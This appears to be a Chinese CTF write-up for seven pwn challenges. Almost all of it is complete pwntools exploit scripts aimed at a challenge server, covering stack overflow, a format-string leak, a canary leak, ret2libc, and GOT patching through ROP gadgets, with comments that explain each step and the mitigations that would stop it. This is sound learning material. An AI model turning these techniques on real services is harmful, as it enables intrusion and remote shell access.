
现在转行还来得及吗?
这里特别感谢C1heck0ut师傅,师傅TQL,不嫌弃我菜,我给师傅拖后腿了。
pwn1:数学咋样?
话不多说,看到提示下载pwntools和ubuntu,直接手撕20个加法
得到flag
pwn2:liuzhuang-secret
栈溢出,程序有system(bin_sh)
#! /usr/bin/env python
# pwn2 (liuzhuang-secret): plain stack overflow. The author notes the binary
# already contains a system("/bin/sh") call, so the saved return address is
# simply pointed at it. The fixed address and fixed padding imply a non-PIE
# binary without a stack canary; either mitigation breaks this as written.
# Python 2 script (str payloads are concatenated with p64() bytes).
from pwn import *
#sh=process('./pwn00')
sh=remote('81.69.0.47',1000)
# Fixed address of the in-binary system("/bin/sh") call (non-PIE).
system_addr=0x000000000040079B
# 0x70 bytes of buffer filler, 8 more bytes (presumably the saved rbp),
# then the new return address.
payload='a'*0x70+'a'*8+p64(system_addr)
sh.sendline(payload)
sh.interactive()
pwn3:fmt
格式化字符串,首先泄露种子,然后猜对16次getshell
#! /usr/bin/env python
# pwn3 (fmt): format-string bug. The first input leaks the RNG seed stored
# in .bss via a '%9$s' read, the seed is fed to a local libc's srand(), and
# the 16 expected rand() values are replayed. A constant format string (or
# FORTIFY_SOURCE rejecting positional '%n$' forms) removes the leak; not
# deriving a secret from rand() at all removes the replay.
# Python 2 script (str payloads are concatenated with p64() bytes).
from pwn import *
from ctypes import *
#sh=process('./fmt')
sh=remote('81.69.0.47',2222)
context.log_level='debug'
# A local libc is loaded only to reproduce the server's rand() sequence;
# the values match only if both sides use the same rand() implementation.
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
# Fixed .bss address of the seed (non-PIE binary).
bss_addr=0x40409C
# '%9$s' prints the 9th variadic argument as a string; the 4 filler bytes
# presumably align p64(bss_addr) onto that argument slot so the seed's
# bytes are what gets printed.
payload='%9$s'+'a'*4+p64(bss_addr)
sh.recvuntil('\n')
sh.sendline(payload)
# Only 4 bytes of seed are read back; zero-extend to 8 for u64().
seed=u64(sh.recv(4).ljust(8,'\x00'))
sh.success('seed : ' +hex(seed))
libc.srand(seed)
# Reproduce and send the 16 numbers the server will generate from this seed.
for i in range(16):
    sleep(1)
    sh.sendline(str(libc.rand()))
#gdb.attach(sh)
sh.interactive()
pwn4:runcode
写个c就好
#include<stdio.h>
#include<unistd.h>

/*
 * pwn4 (runcode): the challenge executes submitted C code, so the program
 * simply execs /bin/cat on the flag file. argv[1] is an empty string; cat
 * is expected to report an error for "" and then continue to the flag path.
 * From the service side, a run-arbitrary-code task needs a real sandbox
 * (seccomp, namespaces, no readable secrets in the filesystem) rather than
 * a source-level filter.
 */
int main(int arg, char **args)
{
    char *argv[]={"cat","","/home/ctf/flag", NULL};
    /* envp is {NULL, NULL}: cat runs with an empty environment. */
    char *envp[]={0,NULL};
    execve("/bin/cat",argv,envp);
}
pwn5:baby_canary
两次输入的机会,第一次覆盖canary最后一个字节来泄露canary,第二次栈溢出跳到后门函数。
#! /usr/bin/env python
# pwn5 (baby_canary): two writes into the same stack buffer. The first
# overwrites only the canary's lowest byte (normally 0x00, which terminates
# string output) so the rest of the canary is echoed back; the second
# overflows with the recovered canary in place, followed by a
# pop rdi / "/bin/sh" / system@PLT chain. Not echoing the buffer back (or
# NUL-terminating it) defeats the leak; PIE would break the fixed addresses.
# Python 2 script (str payloads are concatenated with p64() bytes).
from pwn import *
#sh=process('./baby_canary')
sh=remote('81.69.0.47',3333)
elf=ELF('./baby_canary')
#context.log_level='debug'
# Fixed addresses (non-PIE): a "/bin/sh" string and a pop rdi; ret gadget
# in the binary, plus system's PLT stub read from the ELF.
bin_sh=0x00000000004008ED
system_plt=elf.plt['system']
pop_rdi=0x0000000000400873
sh.recvuntil('may be you know it,plz tell me.\n')
# 0x67 filler bytes, a 'b' marker to sync on, then one 'a' (0x61) over the
# canary's lowest byte. send() rather than sendline() keeps the write at
# exactly 0x69 bytes so nothing else is clobbered.
payload='a'*0x67+'b'+'a'
sh.send(payload)
sh.recvuntil('b')
# The 8 echoed bytes begin with the 'a' we wrote; subtracting 0x61
# restores the real low byte (0x00).
canary=u64(sh.recv(8))-0x61
sh.success('canary : ' +hex(canary))
sleep(0.5)
# 0x68 filler reaches the canary slot; p64(0) presumably covers the saved
# rbp; then the ROP chain.
payload='a'*0x68+p64(canary)+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system_plt)
sh.sendline(payload)
sh.interactive()
pwn6:pwn111
ROP利用,简单题
#! /usr/bin/env python
# pwn6 (pwn111): two-round ret2libc. Round 1 overflows into a ROP chain that
# calls write(1, write@GOT, ...) to leak write's libc address and then
# returns to main for another input; round 2 reuses the overflow to return
# into a one_gadget computed from the leaked libc base. Relies on a non-PIE
# binary (fixed gadget addresses) and on having the server's exact libc
# build for the symbol and one_gadget offsets.
# Python 2 script (str payloads are concatenated with p64() bytes).
from pwn import *
#sh=process('./pwn111')
sh=remote('81.69.0.47',1122)
elf=ELF('./pwn111')
libc=ELF('./libc')
context.log_level='debug'
# Gadgets and symbols at fixed addresses (non-PIE). main_addr is where the
# first chain returns so the program reads input a second time.
pop_rdi=0x0000000000401233
pop_rsi_r15=0x0000000000401231
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x0000000000401146
sh.recvuntil('please input: ')
# 0x80 filler + 8 bytes (presumably saved rbp), then: rdi=1 (stdout),
# rsi=write@GOT, r15=0 (junk), call write@PLT, return to main. The chain
# never sets rdx, so write's length is whatever the register already held.
payload='a'*0x80+'a'*8+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main_addr)
sh.sendline(payload)
# A user-space pointer has only 6 significant bytes; zero-pad to 8.
write_addr=u64(sh.recv(6).ljust(8,'\x00'))
sh.success('write_addr : ' +hex(write_addr))
libc_base=write_addr-libc.symbols['write']
sh.success('llibc_base : ' +hex(libc_base))
# 0x4527a is a one_gadget offset for this specific libc build; it does not
# carry over to other versions.
one_gadget=libc_base+0x4527a
sh.success('one_gadget : ' +hex(one_gadget))
payload='a'*0x80+'a'*8+p64(one_gadget)
sh.sendline(payload)
sh.interactive()
pwn7:pwn222
这里还是参考了riChar师傅的wp才弄懂,太菜了。
具体思路就是通过我们找到的这个gadget,修改read_got为write_got,然后泄露write_got,然后再将write_got修改回read_got,之后再跳回_start函数,最后就是one_gadget一把梭了。
add dword ptr [rbp - 0x3d], ebx ; nop ; ret
#! /usr/bin/env python
# pwn7 (pwn222): instead of calling an output function directly, the chain
# uses an "add dword ptr [rbp - 0x3d], ebx ; nop ; ret" gadget to patch the
# GOT. Round 1: add 0x60 to read@GOT (which, per the author's analysis of
# this libc, turns it into write's address), call the patched read@PLT to
# dump that GOT entry, subtract 0x60 again to restore read, and return to
# _start for a fresh round. Round 2: return into one_gadget. Full RELRO
# (read-only GOT) defeats this technique outright; PIE would break every
# fixed address below.
# Python 2 script (str payloads are concatenated with p64() bytes).
from pwn import *
#sh=process('./pwn222')
sh=remote('81.69.0.47',2212)
elf=ELF('./pwn222')
libc=ELF('./libc')
context.log_level='debug'
read_got=elf.got['read']
read_plt=elf.plt['read']
# Gadgets at fixed addresses (non-PIE). add_ret is the add-dword gadget;
# rbp is later pointed at read_got+0x3d so the add lands exactly on read@GOT.
pop_rbx_rbp_r12_r13_r14_r15_ret=0x000000000040122A
pop_rsi_r15_ret=0x0000000000401231
pop_rdi_ret=0x0000000000401233
add_ret=0x000000000040112c
payload='a'*0x28
# rbx=0x60, rbp=read_got+0x3d, r12..r15=0  ->  read@GOT += 0x60
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
payload+=p64(0x60)
payload+=p64(read_got+0x3d)
payload+=p64(0)*4
payload+=p64(add_ret)
# read@PLT now resolves to write: write(0, read_got, <leftover rdx>).
# fd 0 is used as the output descriptor, which presumably only works because
# the remote service puts stdin and stdout on the same socket.
payload+=p64(pop_rdi_ret)
payload+=p64(0)
payload+=p64(pop_rsi_r15_ret)
payload+=p64(read_got)
payload+=p64(0)
payload+=p64(read_plt)
# ebx=0xFFFFFFA0 (-0x60 in the 32-bit add) restores read@GOT to its
# original value so the program keeps working.
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
payload+=p64(0xFFFFFFFFFFFFFFA0)
payload+=p64(read_got+0x3d)
payload+=p64(0)*4
payload+=p64(add_ret)
# Return to 0x401060 (_start, per the author) so the program re-runs and
# accepts the second payload.
payload+=p64(0x0000000000401060)
sh.sendline(payload)
# The first 8 bytes dumped are the patched GOT entry, i.e. write's address.
write_addr=u64(sh.recv(8))
sh.success('write_addr : ' +hex(write_addr))
libc_base=write_addr-libc.symbols['write']
# 0x4527a is a one_gadget offset specific to this libc build.
one_gadget=libc_base+0x4527a
payload2='a'*0x28+p64(one_gadget)
sh.sendline(payload2)
sh.interactive()